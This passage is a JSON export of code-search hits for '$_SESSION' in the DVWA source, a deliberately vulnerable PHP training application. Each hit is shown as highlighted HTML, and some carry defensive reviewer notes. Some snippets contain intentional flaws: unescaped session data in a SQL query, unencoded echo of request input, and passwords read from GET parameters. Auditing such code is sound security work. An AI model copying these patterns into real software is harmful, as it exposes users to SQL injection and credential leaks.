  "match": "<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'security'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token variable\">$securityHtml</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span 
class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 58,
  "file": "/home/chris/src/DVWA-master/setup.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span>   <span class=\"token operator\">=</span> <span class=\"token string\">'Setup'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'setup'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token 
punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 67,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
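  "note": "This handler is driven by $_GET (lines 3 and 8), so the username and the anti-CSRF token travel in the query string, where they end up in server logs, browser history and Referer headers. The impossible.php variant of this file uses $_POST for the same fields, which avoids that exposure."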
 },
 {
  "id": 74,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 110,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 146,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
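  "note": "The highlighted line passes the request token and the server-side $_SESSION['session_token'] to checkToken(); nothing from the request is written to the session here. Separate observation from the same snippet: the new password is read from $_GET (lines 8-9), so it travels in the URL and can be recorded in server logs, proxies and browser history."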
 },
 {
  "id": 155,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
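  "note": "The highlighted line only reads $_SESSION['session_token'] for the checkToken() call; no request data reaches the session here. Separate observation from the same snippet: the current, new and confirmation passwords are all read from $_GET (lines 8-10), which places credentials in the query string where logs and browser history can retain them."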
 },
 {
  "id": 180,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 238,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/session-input.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'SQL Injection Session Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span>  <span class=\"token 
variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID set!&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID: {$_SESSION[ 'id' ]}&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\">&lt;</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;&lt;/script>\";</span>\n<span class=\"line-number\">16:</span> 
}\n<span class=\"line-number\">17:</span> ",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
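  "note": "Request-controlled $_POST['id'] is copied into $_SESSION['id'] with no validation (line 12) and then interpolated into the page body without output encoding (line 14). Any code that later reads $_SESSION['id'] should treat it as untrusted input; validate it against the expected ID format before storing it and apply htmlspecialchars() when echoing it."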
 },
 {
  "id": 239,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span> <span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
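  "note": "Within this snippet $_SESSION['id'] ends up in the SQL string on line 8 with no escaping or parameter binding. A session value is only as trustworthy as the code that wrote it, so review every writer of $_SESSION['id'] and bind the value through a prepared statement rather than interpolating it."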
 },
 {
  "id": 240,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
